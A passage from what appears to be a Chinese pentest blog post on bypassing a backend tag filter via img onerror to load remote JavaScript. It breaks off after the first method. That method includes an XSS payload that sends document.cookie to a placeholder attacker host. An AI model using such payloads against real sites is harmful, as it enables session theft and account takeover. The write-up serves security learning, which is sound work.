XSS漏洞之加载远程js文件

在一次系统渗透测试中,发现了一个XSS漏洞,但script标签被后端过滤。通过研究,使用img标签绕过后端过滤成功加载远程JS文件。尝试了三种方法,最终通过结合jQuery实现。强调理解原理、多思考和实践的重要性。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

前言

这次在对一个系统渗透测试过程中,发现一个XSS漏洞,可弹窗,并且没有httponly,但是在尝试加载远程js文件的时候发现,script标签被过滤掉了,准确的说应该是服务器后端在识别到输入内容有<>的时候,会把每对尖括号以及尖括号里面的内容都过滤掉,唯独有一个特例,就是img标签不会。

在网上找了一些资料,发现可以用img来加载远程js,陆陆续续试过以下几个方法:

1.第一种方法

<img src=x οnerrοr=document.body.appendChild(document.createElement('img')).src='//xxx.xxx/a?cookie='+document.cookie>

用这种方式是将cookie写入到自己搭建的服务器下的一个txt文件里,这种方式能起作用,但是没读到cookie,失败了。具体原因应该是img不能加载js文件。<

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值